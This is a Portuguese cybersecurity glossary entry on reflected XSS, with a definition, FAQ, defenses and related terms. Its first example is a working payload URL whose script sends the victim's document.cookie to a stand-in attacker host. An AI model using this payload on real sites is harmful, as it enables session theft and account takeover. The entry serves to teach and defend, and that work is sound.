XSS Refletido
O que é XSS Refletido?
XSS RefletidoXSS não persistente em que a entrada controlada pelo atacante é imediatamente refletida na resposta e executada no navegador da vítima.
O XSS refletido (não persistente, Tipo 1) ocorre quando uma aplicação web recebe dados de uma requisição HTTP — normalmente um parâmetro de URL ou campo de formulário — e os ecoa na resposta sem codificação de saída adequada. O ataque requer que a vítima clique num link forjado, sendo geralmente distribuído por phishing, malvertising ou mensagens. A exploração bem-sucedida permite roubar cookies de sessão, executar ações em nome do utilizador ou levar a uma tomada total de conta. As defesas incluem codificação HTML sensível ao contexto, uma Content Security Policy rigorosa e frameworks que fazem auto-escape dos templates.
● Exemplos
- 01
https://exemplo.com/search?q=<script>document.location='https://mau/?c='+document.cookie</script>
- 02
Página de erro que reflete um parâmetro 'message' sem sanitização diretamente no DOM.
● Perguntas frequentes
O que é XSS Refletido?
XSS não persistente em que a entrada controlada pelo atacante é imediatamente refletida na resposta e executada no navegador da vítima. Pertence à categoria Ataques e ameaças da cibersegurança.
O que significa XSS Refletido?
XSS não persistente em que a entrada controlada pelo atacante é imediatamente refletida na resposta e executada no navegador da vítima.
Como funciona XSS Refletido?
O XSS refletido (não persistente, Tipo 1) ocorre quando uma aplicação web recebe dados de uma requisição HTTP — normalmente um parâmetro de URL ou campo de formulário — e os ecoa na resposta sem codificação de saída adequada. O ataque requer que a vítima clique num link forjado, sendo geralmente distribuído por phishing, malvertising ou mensagens. A exploração bem-sucedida permite roubar cookies de sessão, executar ações em nome do utilizador ou levar a uma tomada total de conta. As defesas incluem codificação HTML sensível ao contexto, uma Content Security Policy rigorosa e frameworks que fazem auto-escape dos templates.
Como se defender contra XSS Refletido?
As defesas contra XSS Refletido costumam combinar controles técnicos e práticas operacionais, conforme detalhado na definição acima.
Quais são outros nomes para XSS Refletido?
Nomes alternativos comuns: XSS não persistente, XSS Tipo 1.
● Termos relacionados
- attacks№ 240
Cross-Site Scripting (XSS)
Vulnerabilidade web que permite a um atacante injetar scripts maliciosos em páginas visitadas por outros utilizadores, executados no browser da vítima sob a origem do site.
- attacks№ 1107
XSS Armazenado
Vulnerabilidade persistente de cross-site scripting: o script do atacante é guardado no servidor e executado no navegador de cada visitante.
- attacks№ 347
XSS Baseado em DOM
Variante de XSS em que a injeção e a execução ocorrem inteiramente no navegador porque JavaScript do cliente escreve dados não confiáveis num sink perigoso.
- appsec№ 214
Política de Segurança de Conteúdo (CSP)
Cabeçalho HTTP que informa ao navegador quais origens de scripts, estilos, frames e outros conteúdos são permitidas, limitando o impacto de XSS e injeções de dados.
- attacks№ 821
Phishing
Ataque de engenharia social no qual o atacante se faz passar por uma entidade de confiança para enganar a vítima e obter credenciais, transferir dinheiro ou executar malware.
- appsec№ 773
Codificação de saída
Transformação de dados não confiáveis em uma forma segura para um contexto de saída específico (HTML, JavaScript, URL, SQL, shell) para que não escapem e sejam executados como código.
● Veja também
- № 104XSS Cego